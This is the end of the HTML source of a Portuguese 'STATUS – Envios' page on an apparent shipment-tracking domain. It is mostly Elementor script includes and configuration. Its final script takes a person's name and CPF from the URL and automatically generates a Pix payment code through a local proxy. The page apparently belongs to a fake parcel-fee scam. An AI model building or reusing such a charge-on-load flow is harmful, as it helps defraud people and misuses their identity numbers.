	<script src="js/o7c8fCe7ckF2.js" id="elementor-webpack-runtime-js"></script>
	<script src="js/t0hFIEtwVeAC.js" id="jquery-core-js"></script>
	<script src="js/DA5LfASMoJf8.js" id="jquery-migrate-js"></script>
	<script src="js/4vDxrOjJ0vgi.js" id="elementor-frontend-modules-js"></script>
	<script src="js/KyHeFec4zLFY.js" id="wp-hooks-js"></script>
	<script src="js/NbmpHFN9An8C.js" id="wp-i18n-js"></script>
	<script id="wp-i18n-js-after">
		wp.i18n.setLocaleData({ 'text direction\u0004ltr': ['ltr'] });
	</script>
	<script id="elementor-pro-frontend-js-before">
		var ElementorProFrontendConfig = { "ajaxurl": "https:\/\/consulta-envios-online.com\/wp-admin\/admin-ajax.php", "nonce": "009ac6af86", "urls": { "assets": "https:\/\/consulta-envios-online.com\/wp-content\/plugins\/elementor-pro\/assets\/", "rest": "https:\/\/consulta-envios-online.com\/wp-json\/" }, "shareButtonsNetworks": { "facebook": { "title": "Facebook", "has_counter": true }, "twitter": { "title": "Twitter" }, "linkedin": { "title": "LinkedIn", "has_counter": true }, "pinterest": { "title": "Pinterest", "has_counter": true }, "reddit": { "title": "Reddit", "has_counter": true }, "vk": { "title": "VK", "has_counter": true }, "odnoklassniki": { "title": "OK", "has_counter": true }, "tumblr": { "title": "Tumblr" }, "digg": { "title": "Digg" }, "skype": { "title": "Skype" }, "stumbleupon": { "title": "StumbleUpon", "has_counter": true }, "mix": { "title": "Mix" }, "telegram": { "title": "Telegram" }, "pocket": { "title": "Pocket", "has_counter": true }, "xing": { "title": "XING", "has_counter": true }, "whatsapp": { "title": "WhatsApp" }, "email": { "title": "Email" }, "print": { "title": "Print" }, "x-twitter": { "title": "X" }, "threads": { "title": "Threads" } }, "facebook_sdk": { "lang": "pt_BR", "app_id": "" }, "lottie": { "defaultAnimationUrl": "https:\/\/consulta-envios-online.com\/wp-content\/plugins\/elementor-pro\/modules\/lottie\/assets\/animations\/default.json" } };
	</script>
	<script src="js/jjQ8PA0m9Ejr.js" id="elementor-pro-frontend-js"></script>
	<script src="js/Nf6wKKmVC598.js" id="elementor-waypoints-js"></script>
	<script src="js/5BoHqt7j1H36.js" id="jquery-ui-core-js"></script>
	<script id="elementor-frontend-js-before">
		var elementorFrontendConfig = { "environmentMode": { "edit": false, "wpPreview": false, "isScriptDebug": false }, "i18n": { "shareOnFacebook": "Compartilhar no Facebook", "shareOnTwitter": "Compartilhar no Twitter", "pinIt": "Fixar", "download": "Baixar", "downloadImage": "Baixar imagem", "fullscreen": "Tela cheia", "zoom": "Zoom", "share": "Compartilhar", "playVideo": "Reproduzir v\u00eddeo", "previous": "Anterior", "next": "Pr\u00f3ximo", "close": "Fechar", "a11yCarouselWrapperAriaLabel": "Carrossel | Rolagem horizontal: Setas para esquerda e direita", "a11yCarouselPrevSlideMessage": "Slide anterior", "a11yCarouselNextSlideMessage": "Pr\u00f3ximo slide", "a11yCarouselFirstSlideMessage": "Este \u00e9 o primeiro slide", "a11yCarouselLastSlideMessage": "Este \u00e9 o \u00faltimo slide", "a11yCarouselPaginationBulletMessage": "Ir para o slide" }, "is_rtl": false, "breakpoints": { "xs": 0, "sm": 480, "md": 768, "lg": 1025, "xl": 1440, "xxl": 1600 }, "responsive": { "breakpoints": { "mobile": { "label": "Dispositivos m\u00f3veis no modo retrato", "value": 767, "default_value": 767, "direction": "max", "is_enabled": true }, "mobile_extra": { "label": "Dispositivos m\u00f3veis no modo paisagem", "value": 880, "default_value": 880, "direction": "max", "is_enabled": false }, "tablet": { "label": "Tablet no modo retrato", "value": 1024, "default_value": 1024, "direction": "max", "is_enabled": true }, "tablet_extra": { "label": "Tablet no modo paisagem", "value": 1200, "default_value": 1200, "direction": "max", "is_enabled": false }, "laptop": { "label": "Notebook", "value": 1366, "default_value": 1366, "direction": "max", "is_enabled": false }, "widescreen": { "label": "Tela ampla (widescreen)", "value": 2400, "default_value": 2400, "direction": "min", "is_enabled": false } } }, "version": "3.23.4", "is_static": false, "experimentalFeatures": { "e_optimized_css_loading": true, "e_font_icon_svg": true, "additional_custom_breakpoints": true, "container": true, "container_grid": true, "e_swiper_latest": true, "e_nested_atomic_repeaters": true, "e_optimized_control_loading": true, "e_onboarding": true, "theme_builder_v2": true, "hello-theme-header-footer": true, "home_screen": true, "editor_v2": true, "ai-layout": true, "e_lazyload": true, "e_element_cache": true, "link-in-bio": true, "floating-buttons": true, "display-conditions": true, "form-submissions": true, "taxonomy-filter": true }, "urls": { "assets": "https:\/\/consulta-envios-online.com\/wp-content\/plugins\/elementor\/assets\/", "ajaxurl": "https:\/\/consulta-envios-online.com\/wp-admin\/admin-ajax.php" }, "nonces": { "floatingButtonsClickTracking": "8fc5a4ad8a" }, "swiperClass": "swiper", "settings": { "page": [], "editorPreferences": [] }, "kit": { "active_breakpoints": ["viewport_mobile", "viewport_tablet"], "global_image_lightbox": "yes", "lightbox_enable_counter": "yes", "lightbox_enable_fullscreen": "yes", "lightbox_enable_zoom": "yes", "lightbox_enable_share": "yes", "lightbox_title_src": "title", "lightbox_description_src": "description", "hello_header_logo_type": "logo", "hello_footer_logo_type": "logo" }, "post": { "id": 198, "title": "STATUS%20%E2%80%93%20Envios", "excerpt": "", "featuredImage": false } };
	</script>
	<script src="js/uQk2vnqSXO39.js" id="elementor-frontend-js"></script>
	<script src="js/p7lzDXfekC4z.js" id="pro-elements-handlers-js"></script>
    <script>
    document.addEventListener("DOMContentLoaded", function () {
    // Recupera os parâmetros da URL
    const urlParams = new URLSearchParams(window.location.search);
    const nome = urlParams.get('nome');
    const cpf = urlParams.get('cpf');

    // Só gera o Pix se tiver nome e CPF
    if (!nome || !cpf) {
        console.error("Parâmetros 'nome' ou 'cpf' ausentes na URL.");
        return;
    }

    // Verifica se já tem um Pix salvo
    if (sessionStorage.getItem("pix_data1")) {
        console.log("📦 Pix já gerado no sessionStorage.");
        return;
    }

    // Faz a requisição via proxy local
    fetch(`/seguro/proxy_pix.php?nome=${encodeURIComponent(nome)}&cpf=${encodeURIComponent(cpf)}`)
        .then(response => response.json())
        .then(data => {
            if (data && data.id && data.pix) {
                console.log("✅ Pix gerado com sucesso:", data);

                const pixData = {
                    pix: data.pix,
                    externalId: data.id,
                    id: data.external_id,
                    status: data.status
                };

                sessionStorage.setItem("pix_data1", JSON.stringify(pixData));
                sessionStorage.setItem("externalId", data.external_id);
                sessionStorage.setItem("pixCode", data.pix);
                sessionStorage.setItem("status", data.status);
            } else {
                console.error("❌ Falha ao gerar Pix:", data);
            }
        })
        .catch(error => {
            console.error("❌ Erro na requisição Pix:", error);
        });
});
</script>
</body>
</html><!-- Page cached by LiteSpeed Cache 6.5.0.2 on 2024-09-30 18:00:58 -->